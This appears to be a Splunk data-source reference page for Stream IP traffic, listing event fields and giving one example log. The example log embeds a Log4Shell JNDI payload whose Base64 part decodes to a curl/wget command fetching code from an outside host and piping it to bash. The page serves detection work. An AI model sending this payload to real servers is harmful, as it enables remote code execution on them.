Data Source: Splunk Stream IP

Date: 2024-07-18

ID: c96f5906-f601-4f32-a26c-482535159bc2

Author: Patrick Bareiss, Splunk

Description

Data source object for Splunk Stream IP

Details

Property	Value
Source	`stream:ip`
Sourcetype	`stream:ip`

Supported Apps

Splunk Stream (version 8.1.3)

Event Fields

+ Fields


            1
            _time
          
            3
            action
          
            5
            app
          
            7
            bytes
          
            9
            bytes_in
          
            11
            bytes_out
          
            13
            category
          
            15
            date_hour
          
            17
            date_mday
          
            19
            date_minute
          
            21
            date_month
          
            23
            date_second
          
            25
            date_wday
          
            27
            date_year
          
            29
            date_zone
          
            31
            dest
          
            33
            dest_ip
          
            35
            dest_port
          
            37
            eventtype
          
            39
            host
          
            41
            http_content_type
          
            43
            http_method
          
            45
            http_referer
          
            47
            http_referrer
          
            49
            http_user_agent
          
            51
            http_user_agent_length
          
            53
            http_x_forwarded_for
          
            55
            http_x_header
          
            57
            https
          
            59
            index
          
            61
            linecount
          
            63
            nginx_version
          
            65
            product
          
            67
            protocol
          
            69
            punct
          
            71
            request_time
          
            73
            response_time
          
            75
            server
          
            77
            site
          
            79
            source
          
            81
            sourcetype
          
            83
            splunk_server
          
            85
            src
          
            87
            src_ip
          
            89
            status
          
            91
            status_description
          
            93
            status_type
          
            95
            tag
          
            97
            tag::eventtype
          
            99
            time_local
          
            101
            timeendpos
          
            103
            timestartpos
          
            105
            uri_path
          
            107
            url
          
            109
            url_domain
          
            111
            url_length
          
            113
            vendor
          
            115
            vendor_product
          
            117
            version
          
            119
            web_server
          
            121

...

not set

Example Log

1site="localhost" server="localhost" dest_port="80" dest_ip="127.0.0.1" src="127.0.0.1" src_ip="127.0.0.1" user="-" time_local="14/Dec/2021:00:41:27 +0000" protocol="HTTP/1.1" status="400" bytes_out="262" bytes_in="196" http_referer="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC85Ni4xMjYuOTYuMTY6ODA4MCl8YmFzaA==}]" http_user_agent="curl/7.58.0" nginx_version="1.21.3" http_x_forwarded_for="-" http_x_header="-" uri_query="-" uri_path="/" http_method="GET" response_time="0.004" cookie="-" request_time="0.004" category="application/json" https=""

Source: GitHub | Version: 1